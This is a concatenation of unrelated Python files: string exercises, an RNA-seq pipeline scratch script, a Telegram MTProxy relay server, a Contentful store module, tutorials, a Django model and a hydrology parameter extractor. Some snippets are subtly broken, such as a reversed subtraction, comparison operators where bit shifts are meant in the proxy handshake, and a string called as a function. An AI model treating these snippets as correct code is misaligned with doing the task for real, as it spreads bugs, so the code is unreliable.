if len(str) >=2:
return str[0:2]
return str
'''
Return True if the string "cat" and "dog" appear the same number of times in the given string.
cat_dog('catdog') → True
cat_dog('catcat') → False
cat_dog('1cat1cadodog') → True
'''
def cat_dog(str):
cat = 0
dog = 0
for i in range(2,len(str)):
if str[i] == 't' and str[i-1] == 'a' and str[i-2] == 'c':
cat = cat + 1
if str[i] == 'g' and str[i-1] == 'o' and str[i-2] == 'd':
dog = dog + 1
if cat == dog:
return True
return False
# return how many times string code appears in string
# except we'll accept any letter for the 'd', so "cope" and "cooe" count.
def count_code(str):
code = 0
for i in range(3,len(str)):
if str[i] == 'e' and str[i-2] == 'o' and str[i-3] == 'c':
code = code + 1
return code
# compare end part of 2 strings
'''
Given two strings, return True if either of the strings appears at the very end of the other string,
ignoring upper/lower case differences (in other words, the computation should not be "case sensitive").
Note: s.lower() returns the lowercase version of a string.
end_other('Hiabc', 'abc') → True
end_other('AbC', 'HiaBc') → True
end_other('abc', 'abXabc') → True
'''
def end_other(a, b):
if len(a) > len(b) and a[-len(b)::].lower() == b.lower():
return True
elif len(b) > len(a) and b[-len(a)::].lower() == a.lower():
return True
elif a.lower() == b.lower():
return True
return False
'''
Find first occurence of a character in a string
return -1 if not found
'''
def findNeedle(str,needle):
for i in range(len(str)):
if str[i] == needle:
return i
return -1
print findNeedle("mystring","k")
|
def add(x, y):
"""ADD NUMBERS TO GETHER"""
return x + y
def substract(x, y):
"""SUB NUMBERS TO GETHER"""
return y - x
|
python ~/00script/BI_left/python/AutoStarRsem/C1Pipeline.py
PBMC0102_42ea;08PBMC0102_191213
trim_galore /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz --paired --phred33 -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213
fastqc -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/01QC/08PBMC0102_191213_191213/beforeQC /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz
STAR --runThreadN 2 --genomeDir /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/STAR38 --sjdbGTFfile /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/ensembl/GRCh38/Homo_sapiens.GRCh38.97.gtf --sjdbOverhang 150 --outFilterType BySJout --outFilterMultimapNmax 20 --alignSJoverhangMin 8 --alignSJDBoverhangMin 1 --outFilterMismatchNmax 999 --outFilterMismatchNoverReadLmax 0.02 --alignIntronMin 20 --outFileNamePrefix /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/03star/08PBMC0102_191213_191213/PBMC_2-59 --alignIntronMax 1000000 --alignMatesGapMax 1000000 --readFilesIn /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_1_val_1.fq.gz,/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_2_val_2.fq.gz --readFilesCommand zcat --quantMode TranscriptomeSAM
#========================================================================================================
# conda activate scrna
makebeforefastQC(project_name,rawFa,trimFa)
makeafterfastQC(project_name,rawFa,trimFa)
import os, glob, time
start=time.strftime("%y%m%d")
project_name="07SMC008_%s"%(start)
project_name="07SMC009_191209"
maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/"
maindir="/media/cytogenbi1/D2C67EE7C67ECAED/"
rawFa=glob.glob("/media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/SMC009_30ea/*_1.fastq.gz")
trimFa=[]
for rline in rawFa:
trimdir="%s02trim/%s/"%(maindir,project_name)
trimfile=rline.split("/")[-1].replace("_1.fastq.gz","_1_val_1.fq.gz")
tline="%s%s"(trimdir,trimfile)
trimFa.append(tline)
trimFa=[a.split("/")[-1].split(outExtension)[0] for a in rawFa]
trimFa=glob.glob("%s02trim/%s/*_1_val_1.fq.gz"%(maindir,project_name))
############
/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/07SMC009_191209/SMC_009-1_1_val_1.fq.gz
SMC_009-1_1.fastq.gz
#trimmed
trim1=glob.glob("%s/03trim/01CMC1113/*_1_val_1.fq.gz"%maindir)
print(len(trim1))
trim2=glob.glob("%s/03trim/02pbmc/*_1_val_1.fq.gz"%maindir)
print(len(trim2))
trim3=glob.glob("%s/03trim/03H69plate/*_1_val_1.fq.gz"%maindir)
print(len(trim3))
trim4=glob.glob("%s/03trim/04CMC1819/*_1_val_1.fq.gz"%maindir)
print(len(trim4))
trim5=glob.glob("%s/03trim/03H69C1/*_1_val_1.fq.gz"%maindir)
print(len(trim5))
trimFa=trim1+trim2+trim3+trim4+trim5
maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/"
trimFa=glob.glob("%s02trim/07SMC008_191212/*_1_val_1.fq.gz"%maindir)
print("trimFa length = ", len(trimFa))
print("sum of trim1...trimN = ", len(trim1)+len(trim2)+len(trim3)+len(trim4)+len(trim5))
#================================================================================================================
## Merge QC results
#================================================================================================================
# for file in `ls *.zip`; do unzip "${file}" -d "${file:0:-4}"; done
qcf =glob.glob("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/*/*/summary.txt")
qcline=[]
for files in qcf:
qcff=open(files)
qcline.append(qcff.readlines())
failD={}
qctotal =[]
for aa in qcline:
for bb in aa:
qctotal.append(bb)
if "fail" in bb:
break
ouf=open("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/resQC190917.txt","w")
for aaa in qctotal:
if "FAIL" in aaa:
wrine = "%s:%s\n"%(aaa.split("\t")[2].strip("\n"),aaa.split("\t")[1])
print aaa.split("\t")[2].strip("\n"),":",aaa.split("\t")[1]
ouf.write(wrine)
ouf.close()
failD[aaa.split("\t")[2]]=aaa.split("\t")[1]
|
# coding=utf-8
import asyncio
import hashlib
import json
import os
from openssl import OpenSSLStreamCrypto
TG_SERVERS = ["149.154.175.50", "149.154.167.51", "149.154.175.100", "149.154.167.91", "149.154.171.5"]
class MTProxy(asyncio.Protocol):
def __init__(self, config):
super().__init__()
self.loop = asyncio.get_event_loop()
self.init = True
self.config = config
self.tg_servers = TG_SERVERS
self.to_local_queue = asyncio.Queue()
self.to_sender_queue = asyncio.Queue()
def connection_made(self, transport):
self.transport = transport
asyncio.ensure_future(self.start_send())
def data_received(self, data):
if self.init:
secret_bytes = bytes.fromhex(config.get("secret_key", "0123456789abcdef0123456789abcdef"))
buf64 = data[:64]
decrypt_key, decrypt_iv, encrypt_key, encrypt_iv = MTProxy.generate_key_iv(buf64=buf64)
decrypt_key = hashlib.sha256(decrypt_key + secret_bytes).digest()
encrypt_key = hashlib.sha256(encrypt_key + secret_bytes).digest()
self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0)
self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1)
decrypted_data = self.decryptor.decrypt(buf64)
self.dcID = abs(int.from_bytes(decrypted_data[60:62], "little", signed=True)) - 1
for i in range(4):
if decrypted_data[56 + i] != 0xef:
self.transport.close()
if self.dcID > 4 or self.dcID < 0:
self.transport.close()
asyncio.ensure_future(self.create_sender(self.dcID))
data = data[64:]
self.init = False
decrypted_data = self.decryptor.decrypt(data)
self.to_sender_queue.put_nowait(decrypted_data)
async def create_sender(self, dcid):
remote_addr = self.tg_servers[dcid], 443
_, self.sender = await self.loop.create_connection(lambda: SenderProtocol(self), *remote_addr)
async def start_send(self):
while True:
data = await self.to_local_queue.get()
encrypted_data = self.encryptor.encrypt(data)
self.transport.write(encrypted_data)
@classmethod
def generate_key_iv(cls, buf64):
key_iv = buf64[8:56]
# key's length:32bytes , iv's length:16bytes
decrypt_key, decrypt_iv = key_iv[:32], key_iv[32:]
# reverse bytes sequence
key_iv = key_iv[::-1]
encrypt_key, encrypt_iv = key_iv[:32], key_iv[32:]
return decrypt_key, decrypt_iv, encrypt_key, encrypt_iv
class SenderProtocol(asyncio.Protocol):
def __init__(self, client):
super().__init__()
self.client = client
self.handshaked = asyncio.Event()
def connection_made(self, transport):
self.transport = transport
self.handshake()
asyncio.ensure_future(self.start_send())
def data_received(self, data):
decrypted_data = self.decryptor.decrypt(data)
self.client.to_local_queue.put_nowait(decrypted_data)
def handshake(self):
random_buf = os.urandom(64)
check_list = [0x44414548, 0x54534f50, 0x20544547, 0x4954504f, 0xeeeeeeee]
while True:
tmp1 = (random_buf[3] < 24) | (random_buf[2] < 16) | (random_buf[1] < 8) | (random_buf[0])
tmp2 = (random_buf[7] < 24) | (random_buf[6] < 16) | (random_buf[5] < 8) | (random_buf[4])
if random_buf[0] != 0xef and (tmp1 not in check_list) and tmp2 != 0x00000000:
tmp_bytes_list = list(random_buf)
tmp_bytes_list[56] = tmp_bytes_list[57] = tmp_bytes_list[58] = tmp_bytes_list[59] = 0xef
random_buf = bytes(tmp_bytes_list)
break
random_buf = os.urandom(64)
# Be careful, The order of these variables is reversed compared to client's.
encrypt_key, encrypt_iv, decrypt_key, decrypt_iv = MTProxy.generate_key_iv(buf64=random_buf)
self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0)
self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1)
encrypted_data = self.encryptor.encrypt(random_buf)
encrypted_data = random_buf[:56] + encrypted_data[56:]
self.transport.write(encrypted_data)
self.handshaked.set()
async def start_send(self):
await self.handshaked.wait()
while True:
data = await self.client.to_sender_queue.get()
encrypted_data = self.encryptor.encrypt(data)
self.transport.write(encrypted_data)
try:
config = json.loads(open("config.json", 'r').read())
except Exception as e:
config = {"port": 443, "secret_key": "0123456789abcdef0123456789abcdef"}
port = config.get("port", 443)
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except Exception as e:
pass
loop = asyncio.get_event_loop()
local_addr = "0.0.0.0", port
coro = loop.create_server(lambda: MTProxy(config), *local_addr)
server = loop.run_until_complete(coro)
print('server created ', *local_addr)
try:
loop.run_forever()
except KeyboardInterrupt as e:
print('all tasks cancelled')
print(asyncio.gather(asyncio.Task.all_tasks()).cancel())
|
import contentful
from flask_paginate import Pagination, get_page_parameter
from flask import render_template, request
from decouple import config
########## CONTENTFUL ############
SPACE_ID = config('SPACE_ID')
ACCESS_TOKEN = config('ACCESS_TOKEN')
client = contentful.Client(SPACE_ID, ACCESS_TOKEN)
########## CONTENTFUL ############
PRODUCT_LIMIT = 36
class Products:
def search_product(self, search_query, search_form, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num,
'fields.title[match]': search_query})
page = request.args.get(get_page_parameter(), type=int, default=1)
pagination = Pagination(show_single_page= True, page=page, per_page=36, total=products.total, search=False, record_name='products')
return render_template('store.html', products=products, search_form=search_form, pagination=pagination)
# All Products
def all_products(self, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num})
print(products)
return products
#Sort by Category
def get_by_category(self, query, skip_num):
products = client.entries({'limit': PRODUCT_LIMIT,
'content_type': 'samAndCoProducts',
'skip': skip_num,
'fields.category[match]':query})
return products
def get_product_detail(self, product_id):
product = client.entry({product_id})
return product
def get_discount_items(self):
products = client.entries({'content_type': 'samAndCoProducts',
'fields.category2[match]': 'discount'})
return products
|
#!/usr/local/bin/python3.8
# Methods are functions that are attached to items
# 'append' : append(<appended_item>)
my_list = [1, 2, 3]
my_list.append(4)
# 'insert' : insert(<position>, <appended_item>)
my_list.insert(0, 'a') # ['a', 1, 2, 3, 4]
# 'index' : tells you the position of an item
my_list = ['a', 1, 2, 3, 4]
my_list.index('a') # 0
# 'in' keyword finds whether something exists in a list
my_list = ['a', 1, 2, 3, 4]
'a' in my_list # True
'a' not in my_list # False
'b' in my_list # False
# 'sort' function - sorts out a list in order
my_list = [6, 8, 10, 4]
sorted(my_list) # 4, 6, 8, 10]
# 'reversed' function - reverses the list
my_list = [6, 8, 10, 4]
reversed(my_list) # not useful: <list_reverseiterator object at 0x7f51ad4eea60>
list (reversed(my_list)) # useful list back: [4, 10, 8, 6]
## sort and reverse # to use both, only one type can be used: i.e. int, str, float
my_list = [6, 8, 10, 4]
list (reversed(sorted(my_list))) # [10, 8, 6, 4]
|
from panda3d.core import BoundingBox, Point3
# A collection of points
class PointCloud:
def __init__(self, points = []):
self.points = points
self.calcBoundingBox()
def addPoint(self, point):
if point not in self.points:
self.points.append(point)
self.calcBoundingBox()
def removePoint(self, point):
if point in self.points:
self.points.remove(point)
self.calcBoundingBox()
def calcBoundingBox(self):
self.minX = None
self.minY = None
self.minZ = None
self.maxX = None
self.maxY = None
self.maxZ = None
mins = Point3(99999999)
maxs = Point3(-99999999)
for point in self.points:
if point.x < mins.x:
mins.x = point.x
if point.y < mins.y:
mins.y = point.y
if point.z < mins.z:
mins.z = point.z
if point.x > maxs.x:
maxs.x = point.x
if point.y > maxs.y:
maxs.y = point.y
if point.z > maxs.z:
maxs.z = point.z
if self.minX is None or point.x < self.minX.x:
self.minX = point
if self.minY is None or point.y < self.minY.y:
self.minY = point
if self.minZ is None or point.z < self.minZ.z:
self.minZ = point
if self.maxX is None or point.x > self.maxX.x:
self.maxX = point
if self.maxY is None or point.y > self.maxY.y:
self.maxY = point
if self.maxZ is None or point.z > self.maxZ.z:
self.maxZ = point
self.mins = mins
self.maxs = maxs
self.boundingBox = BoundingBox(self.mins, self.maxs)
self.extents = [
self.minX, self.minY, self.minZ,
self.maxX, self.maxY, self.maxZ
]
|
__author__ = 'apple'
# Get Shapefile Fields and Types - Get the user defined fields
from osgeo import ogr
daShapefile = r"ne1/ne1.shp" # Path your Shapefile
dataSource = ogr.Open(daShapefile)
daLayer = dataSource.GetLayer(0)
layerDefinition = daLayer.GetLayerDefn()
print "Name - Type Width Precision"
for i in range(layerDefinition.GetFieldCount()):
fieldName = layerDefinition.GetFieldDefn(i).GetName()
fieldTypeCode = layerDefinition.GetFieldDefn(i).GetType()
fieldType = layerDefinition.GetFieldDefn(i).GetFieldTypeName(fieldTypeCode)
fieldWidth = layerDefinition.GetFieldDefn(i).GetWidth()
GetPrecision = layerDefinition.GetFieldDefn(i).GetPrecision()
print fieldName + " - " + fieldType+ " " + str(fieldWidth) + " " + str(GetPrecision)
|
from django.conf import settings
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
class BlogPost(models.Model):
title = models.CharField(max_length=40, blank=False, null=False)
text = models.TextField(blank=False)
author = models.ForeignKey(settings.AUTH_USER_MODEL)
private = models.BooleanField(default=False)
creation_time = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
def get_absolute_url(self):
return reverse('blog_platform.views.display_blogpost', args=(self.author, self.slug))
class Meta:
verbose_name = _('BlogPost')
verbose_name_plural = _('BlogPosts')
|
import os
import tarfile
from art.command import run_command
multi_dir = os.path.realpath(os.path.join(os.path.dirname(__file__), "multi"))
files_per_name = {
"a": {".manifest.json", "a.txt", "aa/a2.txt"},
"b": {".manifest.json", "b.txt"},
}
def test_multi(tmpdir):
tmpdir = str(tmpdir)
suffix = "latest"
args = ["--dest", tmpdir, "--suffix", suffix, "--local-source", multi_dir]
run_command(args)
for name, files in files_per_name.items():
for file in files:
assert os.path.isfile(os.path.join(tmpdir, name, suffix, file))
tar_path = os.path.join(tmpdir, "a", suffix, "wrap.tar")
with tarfile.open(tar_path, "r") as tf:
assert set(tf.getnames()) == files_per_name["a"]
|
#Extract_Hydro_Params.py
#Ryan Spies
#ryan.spies@amec.com
#AMEC
#Description: extracts SAC-SMA/UNITHG/LAG-K parameters values
#from CHPS configuration .xml files located in the Config->ModuleConfigFiles
#directory and ouputs a .csv file with all parameters
#Script was modified from Cody's original script
# NOTE: this script only works with the original CHPS SA moduleparfile .xml files...
# not the CHPS CALB parameter mods
#import script modules
import glob
import os
import re
import matplotlib.pyplot as plt
import numpy
from datetime import datetime
from matplotlib.ticker import AutoMinorLocator
from matplotlib.ticker import MultipleLocator
#-----------------------------------------------------------------------------
#START USER INPUT SECTION
#Enter RFC
RFC = 'APRFC'
param_source = 'pre_calb' # choices: 'pre_calb','sa'
#Turn on/off model parameter searchs # choices: 'on' or 'off'
sac = 'off'
snow = 'on'
lag_k = 'off'
uh = 'off'
#Turn on/off plot choices
uh_plots = 'on' # choices: 'on' or 'off' -> UNIT-HG plots
lag_plots = 'off' # choices: 'on' or 'off' -> LAG/K plots
#END USER INPUT SECTION
#-----------------------------------------------------------------------------
homedir = os.getcwd()
if homedir[0:1] != 'P':
maindir = homedir[0:8]
else:
maindir = homedir[0:2]
print 'Script is Running...'
if param_source == 'pre_calb':
folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*'
if param_source == 'sa':
folderPath = maindir + '\\NWS\\chps_sa\\' + RFC.lower() + '_sa\\Config\\ModuleParFiles\\*'
#folderPath = maindir + '\\NWS\\chps_calb\\' + RFC.lower() + '_calb\\Config\\ModuleParFiles\\*'
#SAC-SMA SECTION--------------------------------------------------------------
#loop through SACSMA files in folderPath
if sac == 'on':
print 'Processing SAC-SMA parameters...'
if param_source == 'pre_calb':
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w')
if param_source == 'sa':
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SACSMA_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,NAME,REXP,LZPK,LZFPM,PXADJ,RCI,PFREE,ZPERC,RIVA,MAPE_Input,PEADJ,LZTWM,'\
'RSERV,ADIMP,UZK,SIDE,LZFSM,LZSK,SMZC,UZTWM,UZFWM,PCTIM,EFC,'\
'JAN_ET,FEB_ET,MAR_ET,APR_ET,MAY_ET,JUN_ET,JUL_ET,AUG_ET,SEP_ET,OCT_ET,NOV_ET,DEC_ET' + '\n')
sac_line = 0; basin_count = 0
for filename in glob.glob(os.path.join(folderPath, "SAC*.xml")):
#print filename
basin_count += 1
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('SACSMA_', '')
name = name.replace('_UpdateStates.xml', '')
spl_name = name.split('_')[1]
#print name
csv_file.write(name + ',')
csv_file.write(spl_name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###REXP
#Find line number with REXP value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'REXP' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('REXP,' + line + '\n')
###LZPK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZPK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZPK,' + line + '\n')
###LZFPM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZFPM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZFPM,' + line + '\n')
###PXADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXADJ,' + line + '\n')
###RUNOFF_COMPONENT_INTERVAL
txt_file.seek(0)
line_num=0
if 'RUNOFF_COMPONENT_INTERVAL' not in txt_file.read():
csv_file.write('N/A' + ',')
output_file.write('RUNOFF_COMPONENT_INTERVAL,' + 'N/A' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'RUNOFF_COMPONENT_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RUNOFF_COMPONENT_INTERVAL,' + line + '\n')
###PFREE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PFREE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PFREE,' + line + '\n')
###ZPERC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ZPERC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ZPERC,' + line + '\n')
###RIVA
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'RIVA' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RIVA,' + line + '\n')
###MAPE_Input
txt_file.seek(0)
line_num=0
if 'MAPE' not in txt_file.read():
csv_file.write('FALSE' + ',')
output_file.write('MAPE_Input,' + 'FALSE' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'MAPE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
if 'true' in line or 'TRUE' in line or 'True' in line:
#line = 'TRUE'
csv_file.write('TRUE' + ',')
output_file.write('MAPE_Input,' + 'TRUE' + '\n')
else:
for line in section:
if 'false' in line or 'FALSE' in line or 'False' in line:
#line = 'TRUE'
csv_file.write('FALSE' + ',')
output_file.write('MAPE_Input,' + 'FALSE' + '\n')
###PEADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PEADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PEADJ,' + line + '\n')
###LZTWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZTWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZTWM,' + line + '\n')
###RSERV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'RSERV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RSERV,' + line + '\n')
###ADIMP
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ADIMP' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ADIMP,' + line + '\n')
###UZK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZK,' + line + '\n')
###SIDE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SIDE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SIDE,' + line + '\n')
###LZFSM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZFSM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZFSM,' + line + '\n')
###LZSK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZSK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZSK,' + line + '\n')
###SMZC_INTERVAL
txt_file.seek(0)
line_num=0
if 'SMZC_INTERVAL' not in txt_file.read():
csv_file.write('N/A' + ',')
output_file.write('SMZC_INTERVAL,' + 'N/A' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'SMZC_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SMZC_INTERVAL,' + line + '\n')
###UZTWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZTWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZTWM,' + line + '\n')
###UZFWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZFWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZFWM,' + line + '\n')
###PCTIM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PCTIM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PCTIM,' + line + '\n')
###EFC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'EFC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('EFC,' + line + '\n')
###ET_DEMAND_CURVE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'row A' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num-1:line_num]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JAN_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('FEB_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+1:line_num+2]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MAR_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+2:line_num+3]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('APR_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+3:line_num+4]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MAY_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+4:line_num+5]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JUN_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+5:line_num+6]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JUL_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+6:line_num+7]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('AUG_ET,' + line + '\n')
txt_file.seek(0)
